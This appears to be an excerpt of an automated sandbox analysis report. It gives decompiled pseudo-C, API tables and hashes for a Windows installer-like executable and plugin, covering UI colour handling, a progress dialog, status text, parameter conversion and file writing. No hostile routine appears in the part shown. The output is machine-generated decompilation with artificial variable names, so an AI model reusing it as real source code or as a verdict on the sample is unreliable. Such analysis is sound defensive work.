				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040434a
0x00404400
0x00000000
0x00404400
0x0040435b
0x0040435f
0x00000000
0x00404379
0x00404379
0x00404382
0x00000000
0x00000000
0x00404384
0x00404390
0x00404393
0x00404393
0x00404399
0x0040439f
0x0040439f
0x004043ab
0x004043b1
0x004043b8
0x004043bb
0x004043be
0x004043c0
0x004043c0
0x004043c8
0x004043ce
0x004043ce
0x004043d8
0x004043dd
0x004043e0
0x004043e5
0x004043e8
0x004043e8
0x004043f8
0x004043f8
0x00000000
0x004043fb

APIs

GetWindowLongA.USER32 ref: 00404355
GetSysColor.USER32(00000000), ref: 00404393
SetTextColor.GDI32(?,00000000), ref: 0040439F
SetBkMode.GDI32(?,?), ref: 004043AB
GetSysColor.USER32(?), ref: 004043BE
SetBkColor.GDI32(?,?), ref: 004043CE
DeleteObject.GDI32(?), ref: 004043E8
CreateBrushIndirect.GDI32(?), ref: 004043F2

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6FC524D8, Relevance: 10.6, APIs: 7, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6FC524D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E6FC51215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M6FC52626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x6fc5307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6fc5309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6FC51429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x6fc5405c);
								goto L17;
							case 4:
								__ecx =  *0x6fc5405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x6fc5405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x6fc5405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6fc54000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E6FC512D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E6FC51266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x6fc524e4
0x6fc524e6
0x6fc524f0
0x6fc524f6
0x6fc52500
0x6fc52504
0x6fc52509
0x6fc52509
0x6fc52511
0x6fc52518
0x6fc5251e
0x00000000
0x6fc52525
0x00000000
0x00000000
0x6fc5252c
0x6fc52530
0x6fc52533
0x6fc52537
0x6fc5253e
0x6fc52542
0x6fc52548
0x6fc5254a
0x6fc5254c
0x6fc5254c
0x6fc52553
0x00000000
0x00000000
0x6fc5255c
0x00000000
0x00000000
0x6fc5256c
0x00000000
0x00000000
0x6fc52598
0x6fc525a0
0x6fc525aa
0x6fc525ac
0x6fc525b1
0x00000000
0x00000000
0x6fc52574
0x6fc52578
0x6fc5257a
0x6fc5257b
0x6fc5257d
0x6fc5258d
0x6fc52594
0x00000000
0x00000000
0x6fc525b7
0x6fc525b9
0x6fc525bf
0x6fc525c5
0x6fc525c5
0x00000000
0x00000000
0x6fc5251e
0x6fc525c8
0x6fc525c8
0x6fc525cd
0x6fc525de
0x6fc525de
0x6fc525e4
0x6fc525e9
0x6fc525ee
0x6fc525fa
0x6fc525ff
0x00000000
0x6fc52604
0x6fc525f0
0x6fc525f1
0x6fc52605
0x6fc52605
0x6fc525ee
0x6fc52606
0x6fc5260a
0x6fc5260d
0x6fc52625

APIs

Part of subcall function 6FC51215: GlobalAlloc.KERNEL32(00000040,6FC51233,?,6FC512CF,-6FC5404B,6FC511AB,-000000A0), ref: 6FC5121D

GlobalFree.KERNEL32 ref: 6FC525DE
GlobalFree.KERNEL32 ref: 6FC52618

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 4cf3a55f764b79a9255f4bafc266f24e14c5279140ff2ab2a2329ae97655a9d2
Instruction ID: 797b0fe6cbacbcf0fe7f04d29cd3176b15b646b387b5e05d212920bad89ab522
Opcode Fuzzy Hash: 4cf3a55f764b79a9255f4bafc266f24e14c5279140ff2ab2a2329ae97655a9d2
Instruction Fuzzy Hash: CA41E771508201EFC7018F54CCA8CAB77FAFBC6324B90456DF601A7140EB31A938CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x0040537a
0x00405386
0x00405389
0x0040538f
0x0040539b
0x0040539e
0x004053a1
0x004053a7
0x004053a7
0x004053ad
0x004053b5
0x004053b8
0x004053d5
0x004053d9
0x004053e2
0x004053e2
0x004053ec
0x004053f5
0x00405401
0x00405408
0x0040540c
0x0040540f
0x00405422
0x00405430
0x00405430
0x00405434
0x00405436
0x00405439
0x00000000
0x00405439
0x004053ba
0x004053c2
0x004053ca
0x004053d0
0x00000000
0x004053d0
0x004053ca
0x004053b8
0x00405443

APIs

lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402e5e
0x00402e60
0x00402e67
0x00402e6a
0x00402e6a
0x00402e70
0x00000000
0x00402e70
0x00402e7e
0x00000000
0x00402e81
0x00402e88
0x00402e94
0x00402e9c
0x00402eda
0x00402ee3
0x00000000
0x00402ee8
0x00402ea5
0x00402eb6
0x00000000
0x00402ec4
0x00402ea5
0x00402ef0

APIs

DestroyWindow.USER32(?,00000000), ref: 00402E6A
GetTickCount.KERNEL32 ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c32
0x00404c3f
0x00404c45
0x00404c83
0x00404c83
0x00404c92
0x00404c99
0x00000000
0x00404c9b
0x00404c47
0x00404c56
0x00404c5e
0x00404c61
0x00404c73
0x00404c79
0x00404c80
0x00000000
0x00404c80
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
GetMessagePos.USER32 ref: 00404C47
ScreenToClient.USER32 ref: 00404C61
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99

Strings

f, xrefs: 00404C75

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32 ref: 00402E2B

Strings

verifying installer: %d%%, xrefs: 00402DFE, 00402E07
unpacking data: %d%%, xrefs: 00402DF7

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A

Uniqueness

Uniqueness Score: -1.00%

Function 6FC522F1, Relevance: 9.1, APIs: 6, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6FC522F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E6FC512AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E6FC5123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M6FC5247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E6FC512FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E6FC512FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E6FC51224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x6fc5405c =  *0x6fc5405c +  *0x6fc5405c;
									__edi = GlobalAlloc(0x40,  *0x6fc5405c +  *0x6fc5405c);
									 *0x6fc5405c = MultiByteToWideChar(0, 0, __ebx,  *0x6fc5405c, __edi,  *0x6fc5405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E6FC512FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x6fc5405c;
									__esi = __esi +  *0x6fc54064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E6FC51429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E6FC51224(0x6fc54034);
					goto L10;
				}
			}

0x6fc52306
0x6fc5230a
0x6fc52315
0x6fc52315
0x6fc5231c
0x6fc52321
0x00000000
0x00000000
0x6fc52325
0x6fc52328
0x00000000
0x00000000
0x6fc5232d
0x6fc52338
0x6fc52348
0x6fc5233f
0x6fc52341
0x6fc52357
0x6fc52357
0x00000000
0x6fc5232f
0x6fc5232f
0x6fc52358
0x6fc5235c
0x6fc5235e
0x6fc5235e
0x6fc52361
0x6fc52361
0x6fc52369
0x6fc5236c
0x6fc52373
0x6fc52377
0x6fc52446
0x6fc52447
0x6fc52452
0x6fc5247d
0x6fc5247d
0x6fc52462
0x6fc5246e
0x6fc52464
0x6fc52464
0x6fc52464
0x00000000
0x6fc5237d
0x6fc5237d
0x00000000
0x6fc52384
0x00000000
0x00000000
0x6fc5238d
0x00000000
0x00000000
0x6fc5239b
0x6fc5239e
0x00000000
0x00000000
0x6fc523a7
0x6fc523ac
0x6fc523af
0x6fc523b0
0x00000000
0x00000000
0x6fc523bd
0x6fc523c8
0x6fc523d7
0x6fc523e2
0x6fc52405
0x6fc52408
0x6fc523e4
0x6fc523e8
0x6fc523ee
0x6fc523ef
0x6fc523f2
0x6fc523f3
0x6fc523f6
0x6fc523fd
0x6fc523fd
0x00000000
0x00000000
0x6fc52410
0x6fc52413
0x6fc5241f
0x6fc52421
0x00000000
0x00000000
0x6fc52424
0x6fc52427
0x6fc52428
0x6fc5242f
0x6fc52436
0x6fc52439
0x6fc5243b
0x6fc5243e
0x00000000
0x00000000
0x6fc5237d
0x6fc52377
0x6fc5234d
0x6fc52352
0x00000000
0x6fc52352

APIs

GlobalFree.KERNEL32 ref: 6FC52447

Part of subcall function 6FC51224: lstrcpynA.KERNEL32(00000000,?,6FC512CF,-6FC5404B,6FC511AB,-000000A0), ref: 6FC51234

GlobalAlloc.KERNEL32(00000040,?), ref: 6FC523C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FC523D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6FC523E8
CLSIDFromString.OLE32(00000000,00000000), ref: 6FC523F6
GlobalFree.KERNEL32 ref: 6FC523FD

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 98753b32dd97d03f17dae16e498b7b1744e4c3cc1860a78603819dd570e2c2be
Instruction ID: bb4074fae5c6711d93d3735fdb309f64ae60fcb96e12dcb79781801d26e43871
Opcode Fuzzy Hash: 98753b32dd97d03f17dae16e498b7b1744e4c3cc1860a78603819dd570e2c2be
Instruction Fuzzy Hash: 8141CEB1508701DFD7108F298D98BAAB7F8FF81321F10496AF555DA181F730A978CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
